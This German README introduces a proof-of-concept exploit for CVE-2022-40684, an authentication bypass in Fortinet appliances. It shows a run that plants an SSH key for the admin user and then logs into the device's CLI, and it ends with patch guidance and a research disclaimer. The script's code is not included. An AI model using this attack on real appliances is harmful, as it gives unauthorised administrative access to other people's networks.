
POC für CVE-2022-40684, der Fortinet FortiOS-, FortiProxy- und FortiSwitchManager-Appliances betrifft.
Eine technische Root-Cause-Analyse der Schwachstelle finden Sie in unserem Blog: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
Informationen zur Analyse von Fortinet-Protokollen auf Indikatoren für eine Kompromittierung und zur Aktivierung detaillierterer Protokolle finden Sie in unserem IOC-Blog: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
Dieser POC nutzt die Authentifizierungs-Bypass-Schwachstelle aus, um einen SSH-Schlüssel für den angegebenen Benutzer zu hinterlegen.
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
Aktualisieren Sie auf die neueste Version oder ergreifen Sie Gegenmaßnahmen, indem Sie den Anweisungen im Fortinet PSIRT folgen:
Diese Software wurde ausschließlich für akademische Forschungszwecke und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dafür gedacht, Systeme anzugreifen, außer wenn dies ausdrücklich autorisiert wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für die missbräuchliche Verwendung der Software. Verwenden Sie sie verantwortungsvoll.